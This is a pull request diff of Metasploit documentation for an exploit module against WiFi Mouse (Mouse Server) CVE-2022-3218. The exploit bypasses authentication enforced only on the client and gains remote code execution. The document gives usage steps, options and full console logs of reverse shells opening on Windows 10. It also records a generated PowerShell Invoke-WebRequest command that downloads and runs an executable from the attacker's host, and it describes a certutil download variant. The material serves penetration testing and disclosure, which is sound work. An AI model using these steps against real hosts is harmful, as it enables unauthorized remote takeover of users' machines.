### PR TITLE
wifi mouse auth bypass to rce - CVE-2022-3218

### DIFF
--- a/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
@@ -1,0 +1,221 @@
+## Vulnerable Application
+
+The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
+authentication is completely implemented client side.  Then it is possible
+to open a program on the server (cmd.exe in our case) and type commands
+resulting in an RCE.  While commands are being typed, any user interaction
+will most likely break the payload staging process.
+
+Versions 1.8.3.4 (current as of module writing) and before are vulnerable.
+
+Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b494c56615f48dd09065108d604762-MouseServer.exe)
+
+## Targets
+
+### Pull
+
+The pull target uses an HTTP server on the Metasploit host, and `certutil.exe` to pull the payload down and execute it.
+This method is substantially faster (which is important here), however its also sending payloads over the wire unencrypted.
+
+### Stager
+
+This method uses Metasploits `cmdstager`.  It takes ~3m30s to execute over LAN with default payload,
+and is likely to be spoiled if a user is present on the system at the time of exploitation.
+However, due to sending multiple commands, it is less likely to be corrupted.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/wifi_mouse_rce`
+4. Do: `run`
+5. Set `rhost` and `lhost` as required.
+6. `run`
+7. You should get a shell.
+
+## Options
+
+### SLEEP
+
+The length of time to sleep between each command, this gives the remote program time to process the command on screen.
+
+### LINEMAX
+
+This ONLY applies to the stager method.  How long each line should be that is sent for processing.  While the program
+seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
+Defaults to `1020`
+
+### PATH
+
+This ONLY applies to the pull method.  Where to temporarily store the payload.  Defaults to `c:\\Windows\\Temp\\`
+
+## Scenarios
+
+### Wifi Mouse 1.8.2.3 on Windows 10 using Pull target
+
+```
+resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (mouse.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (mouse.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (mouse.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:1978 - Opening command prompt
+[*] 2.2.2.2:1978 - Typing out payload
+[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/
+[+] 2.2.2.2:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 2.2.2.2:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50921) at 2022-09-04 15:00:49 -0400
+[*] 2.2.2.2:1978 - Server stopped.
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Program Files (x86)\MouseServer.exe>whoami
+whoami
+win10prolicense\windows
+
+C:\Program Files (x86)\MouseServer.exe>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+### Wifi Mouse 1.8.2.3 on Windows 10 using Stager target
+
+```
+resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (mouse.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (mouse.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (mouse.rb)> set target stager
+target => stager
+msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
+verbose => false
+msf6 exploit(windows/misc/wifi_mouse_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:1978 - Opening command prompt
+[*] 2.2.2.2:1978 - Typing out payload
+[*] 2.2.2.2:1978 - Command Stager progress -   1.01% done (1019/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   2.02% done (2038/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   3.03% done (3057/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   4.04% done (4076/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   5.06% done (5095/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   6.07% done (6114/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   7.08% done (7133/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   8.09% done (8152/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -   9.10% done (9171/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  10.11% done (10190/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  11.12% done (11209/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  12.13% done (12228/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  13.14% done (13247/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  14.16% done (14266/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  15.17% done (15285/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  16.18% done (16304/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  17.19% done (17323/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  18.20% done (18342/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  19.21% done (19361/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  20.22% done (20380/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  21.23% done (21399/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  22.25% done (22418/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  23.26% done (23437/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  24.27% done (24456/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  25.28% done (25475/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  26.29% done (26494/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  27.30% done (27513/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  28.31% done (28532/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  29.32% done (29551/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  30.33% done (30570/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  31.35% done (31589/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  32.36% done (32608/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  33.37% done (33627/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  34.38% done (34646/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  35.39% done (35665/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  36.40% done (36684/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  37.41% done (37703/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  38.42% done (38722/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  39.43% done (39741/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  40.45% done (40760/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  41.46% done (41779/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  42.47% done (42798/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  43.48% done (43817/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  44.49% done (44836/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  45.50% done (45855/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  46.51% done (46874/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  47.52% done (47893/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  48.54% done (48912/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  49.55% done (49931/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  50.56% done (50950/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  51.57% done (51969/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  52.58% done (52988/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  53.59% done (54007/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  54.60% done (55026/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  55.61% done (56045/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  56.62% done (57064/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  57.64% done (58083/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  58.65% done (59102/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  59.66% done (60121/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  60.67% done (61140/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  61.68% done (62159/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  62.69% done (63178/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  63.70% done (64197/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  64.71% done (65216/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  65.72% done (66235/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  66.74% done (67254/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  67.75% done (68273/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  68.76% done (69292/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  69.77% done (70311/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  70.78% done (71330/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  71.79% done (72349/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  72.80% done (73368/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  73.81% done (74387/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  74.83% done (75406/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  75.84% done (76425/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  76.85% done (77444/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  77.86% done (78463/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  78.87% done (79482/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  79.88% done (80501/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  80.89% done (81520/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  81.90% done (82539/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  82.91% done (83558/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  83.93% done (84577/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  84.94% done (85596/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  85.95% done (86615/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  86.96% done (87634/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  87.97% done (88653/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  88.98% done (89672/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  89.99% done (90691/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  91.00% done (91710/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  92.01% done (92729/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  93.03% done (93748/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  94.04% done (94767/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  95.05% done (95786/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  96.06% done (96805/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  97.07% done (97824/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  98.08% done (98843/100776 bytes)
+[*] 2.2.2.2:1978 - Command Stager progress -  99.09% done (99862/100776 bytes)
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 2.2.2.2
+[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (100776/100776 bytes)
+[*] Command shell session 3 opened (1.1.1.1:4444 -> 2.2.2.2:50926) at 2022-09-04 15:11:29 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Program Files (x86)\MouseServer.exe>
+```

--- a/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
@@ -12,11 +12,6 @@ Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b
 
 ## Targets
 
-### Pull
-
-The pull target uses an HTTP server on the Metasploit host, and `certutil.exe` to pull the payload down and execute it.
-This method is substantially faster (which is important here), however its also sending payloads over the wire unencrypted.
-
 ### Stager
 
 This method uses Metasploits `cmdstager`.  It takes ~3m30s to execute over LAN with default payload,
@@ -44,13 +39,9 @@ This ONLY applies to the stager method.  How long each line should be that is se
 seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
 Defaults to `1020`
 
-### PATH
-
-This ONLY applies to the pull method.  Where to temporarily store the payload.  Defaults to `c:\\Windows\\Temp\\`
-
 ## Scenarios
 
-### Wifi Mouse 1.8.2.3 on Windows 10 using Pull target
+###  Wifi Mouse 1.8.2.3 on Windows 10 using `psh_invokewebrequest` Stager
 
 ```
 resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
@@ -59,16 +50,20 @@ resource (mouse.rb)> set lhost 1.1.1.1
 lhost => 1.1.1.1
 resource (mouse.rb)> set rhosts 2.2.2.2
 rhosts => 2.2.2.2
-resource (mouse.rb)> run
+resource (mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/wifi_mouse_rce) > run
+
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] 2.2.2.2:1978 - Opening command prompt
 [*] 2.2.2.2:1978 - Typing out payload
-[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/
-[+] 2.2.2.2:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/08HrKbptQFgmk
+[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\pJboqYHF.exe http://1.1.1.1:8080/08HrKbptQFgmk & %TEMP%\\pJboqYHF.exe & del %TEMP%\\pJboqYHF.exe"]
+[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (152/152 bytes)
 [+] 2.2.2.2:1978 - Payload request received, sending 73802 bytes of payload for staging
 [*] Encoded stage with x86/shikata_ga_nai
 [*] Sending encoded stage (267 bytes) to 2.2.2.2
-[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50921) at 2022-09-04 15:00:49 -0400
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49723) at 2022-09-09 05:44:33 -0400
 [*] 2.2.2.2:1978 - Server stopped.
 
 
@@ -77,11 +72,11 @@ Microsoft Windows [Version 10.0.16299.125]
 -----
           
 
-C:\Program Files (x86)\MouseServer.exe>whoami
+C:\Windows\system32>whoami
 whoami
 win10prolicense\windows
 
-C:\Program Files (x86)\MouseServer.exe>systeminfo
+C:\Windows\system32>systeminfo
 systeminfo
 
 Host Name:                 WIN10PROLICENSE
@@ -89,7 +84,7 @@ OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.16299 N/A Build 16299
 ```
 
-### Wifi Mouse 1.8.2.3 on Windows 10 using Stager target
+### Wifi Mouse 1.8.2.3 on Windows 10 using `certutil` Stager
 
 ```
 resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce

--- a/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
@@ -28,10 +28,9 @@ However, due to sending multiple commands, it is less likely to be corrupted.
 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/windows/misc/wifi_mouse_rce`
-4. Do: `run`
-5. Set `rhost` and `lhost` as required.
-6. `run`
-7. You should get a shell.
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell.
 
 ## Options
 

--- a/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
-authentication is completely implemented client side. By utilizing this
+authentication is implemented entirely on the client side. By utilizing this
 vulnerability, it is possible to open a program on the server (cmd.exe
 in our case) and type commands resulting in an RCE.
 
@@ -35,7 +35,7 @@ You should use it in almost all circumstances.
 3. Do: `use exploit/windows/misc/wifi_mouse_rce`
 4. Set `rhost` and `lhost` as required.
 5. Do: `run`
-6. You should get a shell as the user who is running wifi mouse.
+6. You should get a shell as the user who is running Wifi Mouse (Mouse Server).
 
 ## Options
 
@@ -45,13 +45,13 @@ The length of time, in seconds, to sleep between each command. This gives the re
 
 ### LINEMAX
 
-How long each line should be that is sent for processing.  While the program
+How long each line should be that is sent for processing. While the program
 seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
 Defaults to `1020`.
 
 ## Scenarios
 
-###  Wifi Mouse 1.8.3.4 on Windows 10 using `psh_invokewebrequest` Stager
+###  Wifi Mouse (Mouse Server) 1.8.3.4 on Windows 10 using `psh_invokewebrequest` Stager
 
 ```
 resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
@@ -95,7 +95,7 @@ OS Name:                   Microsoft Windows 10 Pro
 OS Version:                10.0.16299 N/A Build 16299
 ```
 
-### Wifi Mouse 1.8.2.3 on Windows 10 using `certutil` Stager
+### Wifi Mouse (Mouse Server) 1.8.2.3 on Windows 10 using `certutil` Stager
 
 ```
 resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
@@ -130,5 +130,14 @@ Microsoft Windows [Version 10.0.16299.125]
 -----
           
 
-C:\Program Files (x86)\MouseServer.exe>
+C:\Program Files (x86)\MouseServer.exe>whoami
+whoami
+win10prolicense\windows
+
+C:\Program Files (x86)\MouseServer.exe>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
 ```

--- a/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
@@ -1,47 +1,55 @@
 ## Vulnerable Application
 
 The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
-authentication is completely implemented client side.  Then it is possible
-to open a program on the server (cmd.exe in our case) and type commands
-resulting in an RCE.  While commands are being typed, any user interaction
-will most likely break the payload staging process.
+authentication is completely implemented client side. By utilizing this
+vulnerability, it is possible to open a program on the server (cmd.exe
+in our case) and type commands resulting in an RCE. While commands are
+being typed, any user interaction will most likely break the payload
+staging process.
 
 Versions 1.8.3.4 (current as of module writing) and before are vulnerable.
 
-Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b494c56615f48dd09065108d604762-MouseServer.exe)
+Version 1.8.3.4 can be downloaded from https://wifimouse.necta.us/apk/MouseServer.exe
+at the time of writing.
 
+Version 1.8.3.0 can be downloaded from https://wifimouse.necta.us/apk/MouseServer1.8.3.0.exe
+
+Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b494c56615f48dd09065108d604762-MouseServer.exe) or from https://wifimouse.necta.us/apk/MouseServer1.8.2.3.exe
+
+Version 1.7.8.5 can be downloaded from https://wifimouse.necta.us/apk/MouseServerLatest.exe
 ## Targets
 
 ### Stager
 
-This method uses Metasploits `cmdstager`.  It takes ~3m30s to execute over LAN with default payload,
+This method uses Metasploit's `cmdstager`. It takes ~3m30s to execute over LAN with default payload,
 and is likely to be spoiled if a user is present on the system at the time of exploitation.
 However, due to sending multiple commands, it is less likely to be corrupted.
 
 ## Verification Steps
 
 1. Install the application
-2. Start msfconsole
-3. Do: `use exploit/windows/misc/wifi_mouse_rce`
-4. Set `rhost` and `lhost` as required.
-5. Do: `run`
-6. You should get a shell.
+1. Start msfconsole
+1. Do: `use exploit/windows/misc/wifi_mouse_rce`
+1. Set `rhost` and `lhost` as required.
+1. Optional: Set `TARGET` as required.
+1. Do: `run`
+1. You should get a shell.
 
 ## Options
 
 ### SLEEP
 
-The length of time to sleep between each command, this gives the remote program time to process the command on screen.
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
 
 ### LINEMAX
 
-This ONLY applies to the stager method.  How long each line should be that is sent for processing.  While the program
+This ONLY applies to the stager method. How long each line should be that is sent for processing. While the program
 seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
-Defaults to `1020`
+Defaults to `1020`.
 
 ## Scenarios
 
-###  Wifi Mouse 1.8.2.3 on Windows 10 using `psh_invokewebrequest` Stager
+### Wifi Mouse 1.8.2.3 on Windows 10 using `psh_invokewebrequest` Stager
 
 ```
 resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce

--- a/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
+++ b/documentation/modules/exploit/windows/misc/wifi_mouse_rce.md
@@ -3,8 +3,7 @@
 The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
 authentication is completely implemented client side.  Then it is possible
 to open a program on the server (cmd.exe in our case) and type commands
-resulting in an RCE.  While commands are being typed, any user interaction
-will most likely break the payload staging process.
+resulting in an RCE.
 
 Versions 1.8.3.4 (current as of module writing) and before are vulnerable.
 
@@ -14,9 +13,14 @@ Version 1.8.2.3 can be downloaded from [edb](https://www.exploit-db.com/apps/46b
 
 ### Stager
 
-This method uses Metasploits `cmdstager`.  It takes ~3m30s to execute over LAN with default payload,
-and is likely to be spoiled if a user is present on the system at the time of exploitation.
-However, due to sending multiple commands, it is less likely to be corrupted.
+This is Metasploit's cmd stager, it has two flavors which can be changed through the advanced option
+`CMDSTAGER::FLAVOR`.
+
+1. `psh_invokewebrequest` (default) this one types the command and pulls back the payload nice and fast.
+You should use it in almost all circumstances.
+2. `certutil`  typing of the payload appears on the user's screen, and is thus unreliable
+(needs ~3.5min of solitude). If the user types anything or moves the focus to another window, exploit will fail.
+
 
 ## Verification Steps
 
@@ -25,7 +29,7 @@ However, due to sending multiple commands, it is less likely to be corrupted.
 3. Do: `use exploit/windows/misc/wifi_mouse_rce`
 4. Set `rhost` and `lhost` as required.
 5. Do: `run`
-6. You should get a shell.
+6. You should get a shell as the user who is running wifi mouse.
 
 ## Options
 
@@ -35,13 +39,13 @@ The length of time to sleep between each command, this gives the remote program 
 
 ### LINEMAX
 
-This ONLY applies to the stager method.  How long each line should be that is sent for processing.  While the program
+How long each line should be that is sent for processing.  While the program
 seems to be able to take ~2048, anything more than ~1020 seems to crash the program. 1000 - 1020 should be safe.
 Defaults to `1020`
 
 ## Scenarios
 
-###  Wifi Mouse 1.8.2.3 on Windows 10 using `psh_invokewebrequest` Stager
+###  Wifi Mouse 1.8.3.4 on Windows 10 using `psh_invokewebrequest` Stager
 
 ```
 resource (mouse.rb)> use exploits/windows/misc/wifi_mouse_rce
@@ -57,13 +61,14 @@ msf6 exploit(windows/misc/wifi_mouse_rce) > run
 [*] Started reverse TCP handler on 1.1.1.1:4444 
 [*] 2.2.2.2:1978 - Opening command prompt
 [*] 2.2.2.2:1978 - Typing out payload
-[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/08HrKbptQFgmk
-[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\pJboqYHF.exe http://1.1.1.1:8080/08HrKbptQFgmk & %TEMP%\\pJboqYHF.exe & del %TEMP%\\pJboqYHF.exe"]
-[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (152/152 bytes)
-[+] 2.2.2.2:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 2.2.2.2:1978 - Using URL: http://1.1.1.1:8080/qGn4ESH
+[*] 2.2.2.2:1978 - Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\IDcEhcbA.exe http://1.1.1.1:8080/qGn4ESH & %TEMP%\\IDcEhcbA.exe & del %TEMP%\\IDcEhcbA.exe"]
+[*] 2.2.2.2:1978 - Command Stager progress - 100.00% done (146/146 bytes)
+[*] 2.2.2.2:1978 - Client 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98) requested /qGn4ESH
+[*] 2.2.2.2:1978 - Sending payload to 2.2.2.2 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.16299.98)
 [*] Encoded stage with x86/shikata_ga_nai
 [*] Sending encoded stage (267 bytes) to 2.2.2.2
-[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49723) at 2022-09-09 05:44:33 -0400
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50211) at 2022-09-21 16:29:06 -0400
 [*] 2.2.2.2:1978 - Server stopped.
 
 
@@ -93,8 +98,8 @@ resource (mouse.rb)> set lhost 1.1.1.1
 lhost => 1.1.1.1
 resource (mouse.rb)> set rhosts 2.2.2.2
 rhosts => 2.2.2.2
-resource (mouse.rb)> set target stager
-target => stager
+resource (mouse.rb)> set CMDSTAGER::FLAVOR certutil
+CMDSTAGER::FLAVOR => certutil
 msf6 exploit(windows/misc/wifi_mouse_rce) > set verbose false
 verbose => false
 msf6 exploit(windows/misc/wifi_mouse_rce) > run
@@ -105,99 +110,7 @@ msf6 exploit(windows/misc/wifi_mouse_rce) > run
 [*] 2.2.2.2:1978 - Command Stager progress -   1.01% done (1019/100776 bytes)
 [*] 2.2.2.2:1978 - Command Stager progress -   2.02% done (2038/100776 bytes)
 [*] 2.2.2.2:1978 - Command Stager progress -   3.03% done (3057/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -   4.04% done (4076/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -   5.06% done (5095/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -   6.07% done (6114/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -   7.08% done (7133/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -   8.09% done (8152/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -   9.10% done (9171/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  10.11% done (10190/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  11.12% done (11209/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  12.13% done (12228/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  13.14% done (13247/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  14.16% done (14266/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  15.17% done (15285/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  16.18% done (16304/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  17.19% done (17323/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  18.20% done (18342/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  19.21% done (19361/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  20.22% done (20380/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  21.23% done (21399/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  22.25% done (22418/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  23.26% done (23437/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  24.27% done (24456/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  25.28% done (25475/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  26.29% done (26494/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  27.30% done (27513/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  28.31% done (28532/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  29.32% done (29551/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  30.33% done (30570/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  31.35% done (31589/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  32.36% done (32608/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  33.37% done (33627/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  34.38% done (34646/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  35.39% done (35665/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  36.40% done (36684/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  37.41% done (37703/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  38.42% done (38722/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  39.43% done (39741/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  40.45% done (40760/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  41.46% done (41779/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  42.47% done (42798/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  43.48% done (43817/100776 bytes)
